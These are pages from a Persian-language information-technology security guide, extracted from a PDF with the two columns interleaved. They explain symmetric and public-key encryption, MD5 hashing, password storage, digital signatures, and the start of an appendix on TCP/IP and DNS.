‫ﻣﺘﻨﺎﻇﺮ ﺍﻳﻦ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻭ ﺑﺨﻮﺍﻧﺪ‪.‬‬ ‫ﻻ ﺍﻋﺪﺍﺩ ﺩﻭﺩﻭﻳﻲ ‪ ۱۲۸‬ﺑﻴﺘـﻲ ﻫـﺴﺘﻨﺪ‪.‬‬ ‫ﺑﺒﺮﺩ‪ .‬ﺍﻣﺮﻭﺯﻩ ﻛﻠﻴﺪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻳﻦ ﺭﻗﻢ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺮﺍﺑﺮ ﺑﺎ‪:‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻋﻜﺲ ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ‬
‫‪۳۴۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰,۰۰۰‬‬
‫ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺑـﺎ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ‬
‫ﺍﻧﺘﺨﺎﺏ ﻣﺨﺘﻠﻒ ﺍﺳﺖ ﻛﻪ ﺣﺪﺱ ﺯﺩﻥ ﺻـﺤﻴﺢ ﻛﻠﻴـﺪ ﺭﺍ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﺧﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻭ ﻫﺮ ﻛﺴﻲ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺷـﻤﺎ ﺭﺍ‬
‫ﻏﻴﺮ ﻣﻤﻜﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﭽـﻪ‬
‫ﺑﻪ ﺍﺛﺒﺎﺕ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤﺌﻨـﹰﺎ ﻓﺮﺳـﺘﻨﺪﺓ ﭘﻴـﺎﻡ ﻛـﺴﻲ‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻫﻨﮕﺎﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻛـﻪ‬
‫ﻧﻴﺴﺖ ﺟﺰ ﺷﻤﺎ‪.‬‬ ‫ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴـﺪ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨﺪ )ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻠﻴﺪ ﻣﺸﺨﺺ ﺑﻪ ﺗﻮﺍﻓﻖ ﺭﺳـﻴﺪﻩ‬

‫‪141 Encryption Key‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٠٨‬‬

‫ﻳﻜﺴﺎﻥ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﻣـﺸﺨﺺ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺻﺤﻴﺢ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﻓﺮﺍﻣﻮﺵ‬ ‫‪١٤٢‬‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱ‬
‫ﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ‬ ‫ﻛﻨﺪ ﺭﻣﺰﮔﺸﺎﻳ ﹺ‬
‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﻳﻚ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺟﺪﻳـﺪ ﺍﻧﺘﺨـﺎﺏ‬ ‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺭﻭﺵ ﺭﺍ ﻣﺸﺎﺑﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺑﺪﺍﻧﻴـﺪ‬
‫ﮔﺮﺩﺩ‪ .‬ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ‬ ‫ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻴﭽﻜﺲ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻧـﺪﺍﺭﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ‬
‫ﺍﺻﻞ ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﻴﭽﮕﺎﻩ ﻧﺘﻮﺍﻧﺪ ﺩﺭ ﻗﺎﻟﺐ ﺍﺻﻠﻲ ﺧـﻮﺩ ﺑـﻪ‬ ‫ﻣﻄﺎﻟﺐ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﻧﻤﻲ ﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ‬
‫ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ‪.‬‬ ‫ﮔﺮﺩﻧﺪ؛ ﻭ ﺗﻔﺎﻭﺕ ﺁﻥ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﻳـﻦ ﺍﺳـﺖ‬
‫ﻻ ﺣﺪﺍﻛﺜﺮ ﻃﻮﻝ ﻣﺸﺨﺼﻲ ﺩﺍﺭﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ‬ ‫ﻛﻪ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻨﻮﺯ ﻳﻚ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑـﻪ ﺩﻟﻴـﻞ ﺁﻥ‬
‫ﺭﺍﻳﺠﺘــﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬــﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻳﻜﻄﺮﻓــﻪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻛﺎﺭﺑﺮ ﻧﺒﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻛﻮﺗـﺎﻩ‪ ،‬ﺳـﺎﺩﻩ ﻭ ﻳـﺎ ﻗﺎﺑـﻞ‬
‫ﺩﺭﻫــﻢﺳــﺎﺯﻱ‪ ،‬ﺍﻟﮕــﻮﺭﻳﺘﻤﻲ ﺑﻨــﺎﻡ ‪ ١٤٣MD5‬ﺍﺳــﺖ‪ .‬ﺧﺮﻭﺟــﻲ‬
‫ﺣﺪﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﺍﮔـﺮ ﻛـﺴﻲ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ‪ ،MD5‬ﻫﻤﻴﺸﻪ ‪ ۱۲۸‬ﺑﻴﺖ )‪ ۱۶‬ﺑﺎﻳـﺖ( ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﻣﺰﮔ ـﺬﺍﺭﻱﺷــﺪﻩ ﺑﺪﺳــﺖ ﺁﻭﺭﺩ )ﻣــﺜ ﹰ‬
‫ﻼ ﺍﺯ‬
‫ﻳﻚ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺑﺮﺍﻱ ﺩﻭ ﭘﻴـﺎﻡ ﻣﺘﻔـﺎﻭﺕ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ‬
‫ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻧﻔﻮﺫ ﻛﺮﺩﻩ( ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﺧﺮﻭﺟﻲ ﺩﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﻣﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮ ﹺﺭ ﺳﺎﺩﺓ ﻣﻤﻜﻦ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻧﻤـﻮﺩﻩ ﻭ‬
‫ﺑﺎﺷﻨﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺻﻔﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺑﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺗﻄﺒﻴـﻖ‬
‫ﺩﻫﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﺓ ﺳﻴﺴﺘﻢ ﺭﺍ ﭘﻴـﺪﺍ‬ ‫ﺍﻳﻦ ﺭﻭﺵ ﻭ ﻛﺪ ﺧﺮﻭﺟﻲ ﺗﻮﻟﻴﺪ ﺷـﺪﻩ ﺩﺭ ﺁﻥ ﺩﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﺻـﻠﻲ‬
‫ﻛﻨﺪ‪.‬‬ ‫ﺩﺍﺭﻧﺪ‪:‬‬

‫‪١٤٤‬‬ ‫ﺗﻀﻤﻴﻦ ﺟﺎﻣﻌﻴﺖ‬


‫ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺷﻤﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻳـﻚ ﺳـﻨﺪ ﻃـﻮﻻﻧﻲ ﻳـﺎ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﺨﻮﺍﻫﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺎﻣﻲ ﺧﺼﻮﺻﻲ ﺍﺭﺳﺎﻝ ﻛﻨـﺪ ﻭ‬
‫ﺑﺮﮔﺰﻳﻨﻴــﺪ‪ ،‬ﻛــﺪ ‪ MD5‬ﺭﺍ ﺑــﺮﺍﻱ ﺁﻥ ﻣﺤﺎﺳــﺒﻪ ﻭ ﺁﻧــﺮﺍ ﺩﺭ‬
‫ﺑﺨﻮﺍﻫﺪ ﺷﻤﺎ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓﺮﺳﺘﻨﺪﻩ ﺁﻥ ﭘﻴﺎﻡ ﻛـﺴﻲ ﺟـﺰ ﺍﻭ‬
‫ﻣﺤﻠﻲ ﺍﻣﻦ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻣﺪﺗﻲ ﺑﻌﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﺳـﻨﺎﺩ‬
‫ﻧﻴﺴﺖ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﺮﻛﻴﺐ ﺭﻭﺷﻬﺎﻱ ﭘﻴﺶﮔﻔﺘﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪:‬‬
‫ﺧﻮﺩ ﻣﺮﺍﺟﻌﻪ ﻭ ﺩﻭﺑﺎﺭﻩ ﺭﻭﻱ ﺁﻥ ﻫﻤﻴﻦ ﻋﻤﻠﻴﺎﺕ ﺭﺍ ﺍﻋﻤـﺎﻝ‬
‫‪ .۱‬ﭘﻴــﺎﻡ ﺭﺍ ﻣــﻲﻧﻮﻳــﺴﺪ ﻭ ﺍﺯ ‪ MD5‬ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﻛــﺪ‬ ‫ﻛﻨﻴﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﭼﻨﺎﻧﭽﻪ ﻛﺪ ﺟﺪﻳﺪ ﻣﺘﻤﺎﻳﺰ ﺍﺯ ﻛﺪ ﻗﺒﻠـﻲ ﺑـﻮﺩ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺳـﻨﺪ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫‪ .۲‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ‪ ،‬ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱﺷـﺪﻩ ﺭﺍ‬ ‫ﻻ ﻳﻚ ﺗﻐﻴﻴﺮ ﺑﺴﻴﺎﺭ ﺟﺰﺋﻲ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺑﺰﺭﮒ ﻫـﻢ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺑﺎﻋﺚ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻛـﺪ ‪ MD5‬ﻣﺮﺑﻮﻃـﻪ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪ .۳‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺷﻤﺎ ﻣـﺘﻦ ﭘﻴـﺎﻡ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺫﺧﻴﺮﺓ ﺭﻣﺰ ﻋﺒﻮﺭ‬

‫‪ .۴‬ﭘﻴﺎﻡ ﻭ ﻛﺪ ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﻛﻠﻤـﻪﺍﻱ‬
‫ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﻛﻠﻤﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫‪ .۵‬ﺷﻤﺎ ﭘﻴﺎﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ‪.‬‬
‫ﺍﻟﮕــﻮﺭﻳﺘﻢ ‪) MD5‬ﻳــﺎ ﻳــﻚ ﺍﻟﮕــﻮﺭﻳﺘﻢ ﻣــﺸﺎﺑﻪ( ﺭﻣﺰﮔــﺬﺍﺭﻱ‬
‫‪ .۶‬ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴــﺪ ﻋﻤــﻮﻣﻲ ﻭﻱ ﻛــﺪ ﺩﺭﻫــﻢﺳــﺎﺯﻱ ﺭﺍ‬ ‫ﻣﻲﺷﻮﺩ ﻭ ﻧﺴﺨﺔ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺫﺧﻴﺮﻩ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺑﺎﺭ ﺑﻌﺪ‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻴﺪ‪ ،‬ﻛﻪ ﻧﺘﻴﺠـﻪ ﺁﻥ ﺑﺪﺳـﺖ ﺁﻣـﺪﻥ ﻛـﺪ‬ ‫ﻛﻪ ﻛﺎﺭﺑﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ‪ ،‬ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱ ﺍﺻﻠﻲ ﺍﺳﺖ‪.‬‬ ‫ﻣﻲﻛﻨﺪ ﻣﺠﺪﺩﹰﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﺷـﻮﺩ ﻭ ﺑـﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ‬
‫ﺩﻳﺴﻚ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺑﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﮔـﺮﺩﺩ؛ ﻭ ﺩﺭﺻـﻮﺭﺕ‬

‫‪142 Hash‬‬
‫‪144 Digital Signature‬‬ ‫‪143 Message Digest 5‬‬
‫‪١٠٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫‪ .۷‬ﻣﺘﻦ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﺧـﻮﺩ‬


‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﻴﺪ‪.‬‬
‫‪ .۸‬ﺑــﺮﺍﻱ ﻣــﺘﻦ ﭘﻴــﺎﻡ ﺍﺭﺳــﺎﻟﻲ‪ ،‬ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ‪ MD5‬ﻛــﺪ‬
‫ﺩﺭﻫﻢﺳﺎﺯﻱ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪ .۹‬ﺍﮔﺮ ﺩﻭ ﻛـﺪ ﺩﺭﻫـﻢﺳـﺎﺯﻱ ﺑﺪﺳـﺖ ﺁﻣـﺪﻩ ﻳﻜـﺴﺎﻥ ﺑﻮﺩﻧـﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﻳﺎﺑﻴـﺪ ﻣـﺘﻦ ﺍﺭﺳـﺎﻟﻲ ﺗﻐﻴﻴـﺮ ﻧﻜـﺮﺩﻩﺍﺳـﺖ ﻭ‬
‫ﻓﺮﺳﺘﻨﺪﻩ ﻧﻴﺰ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ١٤٥‬ﻛﻪ ﺑﻮﺳـﻴﻠﻪ ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ﺑـﺮﺍﻱ‬


‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻤﻦ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺑﺮ ﺍﺳﺎﺱ‬
‫ﻓﻨﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ )ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﻓﻮﻕ( ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫‪145 Digital Certificates‬‬


‫‪١١١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫‪١٤٧‬‬
‫ﺧﺪﻣﺎﺕ ﻧﺎﻡ ﺩﺍﻣﻨﻪ‬
‫ﭼﻮﻥ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻃﻮﻻﻧﻲ ﺍﻋﺪﺍﺩ ﺳـﺨﺖ ﺍﺳـﺖ‬
‫‪١٤٨‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ )ﻛﻪ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ‬
‫ﻧﺎﻣﻴـــﺪﻩ ﻣـــﻲﺷـــﻮﻧﺪ( ﻧﺎﻣﮕـــﺬﺍﺭﻱ ﺷـــﺪﻩﺍﻧـــﺪ‪ .‬ﻧﻤﻮﻧـــﺔ ﺁﻥ‬
‫‪ www.infodev.org‬ﺍﺳﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻧﺎﻡ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮ‬
‫ﺿﻤﻴﻤﺔ ‪۲‬‬
‫ﻭﺏ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲ ﺧـﺎﺹ ﺑﻨـﺎﻡ‬ ‫‪TCP/IP‬‬
‫‪ DNS‬ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨـﺪ‪ DNS .‬ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺮﻭﻑ ﺍﻟﻔﺒـﺎ ﺭﺍ ﺑـﻪ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺷﻤﺎﺭﻩ ﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﺪ )ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺷﻤﺎﺭﻩ ﻣﻮﺭﺩ ﻧﻈﺮ ‪192.86.99.121‬‬
‫ﭘﺮﻭﺗﻜــﻞ ‪ TCP/IP‬ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ﺍﺳــﺖ ﻛــﻪ ﺗﻤــﺎﻡ‬
‫ﺍﺳـﺖ(‪ .‬ﻫﻤﭽﻨﻴﻦ ‪ DNS‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ‪ .‬ﺍﮔﺮﭼـﻪ ﻧﻴـﺎﺯﻱ‬
‫ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺟﺎﺑﺠـﺎ ﺷـﻮﺩ؛ ﭼـﻮﻥ ﺩﺍﻣﻨـﺔ ﻣﺮﺑﻮﻃـﻪ‬ ‫ﻧﻴﺴﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺭﺑـﺎﺭﺓ‬
‫ﺁﺩﺭﺱ ﺟﺪﻳــﺪ ﺭﺍ ﺑــﻪ ‪ DNS‬ﺍﻃــﻼﻉ ﻣــﻲﺩﻫــﺪ ﻭ ﻟــﺬﺍ ﻛــﺎﺭﺑﺮﺍﻥ‬ ‫‪ TCP/IP‬ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﺍﻣـﺎ ﺑﺎﻳـﺪ ﺩﺭﺑـﺎﺭﺓ ﭘﻴﻜـﺮﺑﻨـﺪﻱ‬
‫ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﻤﺎﻥ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺑﺪﺍﻧﻨﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣـﻪ‬
‫ﺷﺮﺡ ﺳﺎﺩﻩﺍﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ‪ TCP/IP‬ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺎ ﺍﻳﻦ‬
‫‪١٤٩‬‬
‫‪ :IP‬ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ‬ ‫ﻣﻔﺎﻫﻴﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺍﻧﺪﻥ ﺍﻳﻦ ﻗﺴﻤﺖ ﺻـﺮﻓﻨﻈﺮ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﺑـﻪ ﺷـﻜﻞ‬
‫‪١٥٠‬‬
‫ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺣﺮﻭﻑ ﻭ ﻧﺸﺎﻧﻪ ﺩﺭ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺑـﺴﺘﻪ‬ ‫ﺁﺩﺭﺱﺩﻫﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
